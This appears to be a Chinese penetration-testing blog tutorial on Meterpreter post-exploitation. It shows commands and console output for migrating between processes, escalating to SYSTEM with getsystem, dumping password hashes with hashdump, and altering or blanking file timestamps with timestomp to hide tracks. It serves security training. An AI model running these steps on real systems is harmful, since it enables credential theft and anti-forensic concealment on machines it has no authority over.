转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86666767
1.迁移到更安全的进程
migrate [要迁移到的进程id]
2.获取系统级权限
getsystem
注:getsystem模块在比较新的Windows系统中不太稳定,最好使用本地的提升权限方法和模块来提升控制权限。
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
3.获取密码的哈希值
run hashdump
获取了目标的系统级管理权限后,就可以使用hashdump命令获取被渗透系统上登录密码的哈希值。
4.修改文件的访问时间、修改时间和创建时间
这里用到的命令是timestomp
4-1.查看文件的时间信息
timestomp -v [目标文件]
meterpreter > timestomp -v e:\test.txt
[*] Showing MACE attributes for e:test.txt
Modified : 2019-01-25 10:24:42 +0800
Accessed : 2019-01-25 11:20:58 +0800
Created : 2019-01-25 10:23:22 +0800
Entry Modified: 2019-01-25 10:24:42 +0800
4-2.修改文件的时间信息
timestomp -z [时间信息] [目标文件]
此时的时间信息格式为:MM/DD/YYYY HH24:MI:SS
meterpreter > timestomp -v e:\test.txt
[*] Showing MACE attributes for e:test.txt
Modified : 2019-01-25 10:24:42 +0800
Accessed : 2019-01-25 11:20:58 +0800
Created : 2019-01-25 10:23:22 +0800
Entry Modified: 2019-01-25 10:24:42 +0800
meterpreter >
meterpreter > timestomp -z "01/25/2019 11:00:00" e:\test.txt
[*] Setting specific MACE attributes on e:test.txt
meterpreter > timestomp -v e:\test.txt
[*] Showing MACE attributes for e:test.txt
Modified : 2019-01-25 11:00:00 +0800
Accessed : 2019-01-25 11:26:29 +0800
Created : 2019-01-25 11:00:00 +0800
Entry Modified: 2019-01-25 11:00:00 +0800
4-3.清空时间信息
timestomp -b [目标文件]
meterpreter > timestomp -b e:\test.txt
[*] Blanking file MACE attributes on e:test.txt